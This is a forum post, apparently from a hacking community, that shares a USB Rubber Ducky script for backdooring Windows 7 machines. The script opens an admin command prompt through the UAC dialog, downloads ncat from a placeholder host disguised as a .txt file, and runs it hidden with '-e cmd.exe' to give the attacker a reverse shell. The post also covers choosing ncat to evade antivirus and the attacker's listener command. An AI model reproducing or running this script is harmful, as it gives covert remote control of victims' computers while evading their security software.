[Source] Undetected windows backboor shell w/ Uac (Win7)

[Grimsoul]

Just picked up my rubber ducky and thought i'd contribute a bit. (First post btw , Hi!)

So we all know that netcat gets picked up by most anti-virus (ratio of about 23/53 ratio) which makes using it as a backdoor slightly challenging.
After doing some reading , I figured out that ncat (by nmap) , a moderized version of ncat only had a ratio of 4/53 and was undetected by a lot of major anti-virus programs.
So here is a (relatively) undetected backdoor to any windows 7 machine, coded from scratch by yours truly. By no means complicated or innovative at all.

For this attack , we download a copy of ncat on the victims machine and run it silently.

You can pick up a portable exe of ncat straight from the developers website (1.5 mb) here.

ncat , unlike netcat doesn't run in the background like netcat does (requires a cmd to be open to keep the connection alive) so I used so crafty powershell arguments to force it into the background.

The rest is explained in the comments.

You can compare the AV results between netcat and ncat here:

VirusTotal ncat results (Picked up by norton though , sucks i know)

VirusTotal netcat results

Please feel free to adapt this for your own tailored needs, be it persistence , no-download (twin-duck) or hidden cmd window.

- GrimsouL

REM --Windows shell undetected by AV (Ncat Download required) WIN7/UAC-- by: GrimSouL 11/7/2014 

REM //This delay required on my PC before attempting to get start menu , may not be required on yours/target.
DELAY 1000
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
REM //This dely is long because in my machine right clicking certain things takes a long time (many menu options) , adjust as needed.
DELAY 1000
STRING a
DELAY 200
REM //This enter required for my PC, i've seen alot of scripts where this is omitted but the 'a' above only selects the 'Run as admin' on my machine , hence we need an enter to actually 'click' it
ENTER
REM //This delay may need to be adjusted depending on machine. Sometimes takes long due to background dimming
DELAY 700
LEFTARROW
DELAY 400
ENTER
DELAY 700
REM //Simple powershell to download ncat portable. You can see it's a .txt extension because most hosters dont allow .exe files. So we change the extension of ncat to a .txt and upload it then rename it back to an exe after download
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://yourhost.com/yourPayload.txt','%WINDIR%\System32\yourPayload.exe')
ENTER
REM //This delay is set to 10 seconds to wait for the downloaded file. Adjust as needed for your/targets connection speed.(ncat = 1.58MB)
DELAY 10000
ENTER
REM //Where the magic happens , we run the downloaded ncat exe , since ncat doesn't run in the background  , we use a powershell argument to make it so.
STRING powershell Start-Process -WindowStyle hidden -FilePath %WINDIR%\System32\payloadEn.exe -ArgumentList '<attackerIP> <attackerPORT> -e cmd.exe'
ENTER
REM // We exit our powershell , however ncat runs silently leaving us with a clean getaway
STRING exit
ENTER

To run our listener on the attacker machine

ncat -l <ATTACKER IP> -p <ATTACKER PORT> -v

[Grimsoul]

This also works on x64 machines , unlike the base64 payload that uses a vb script.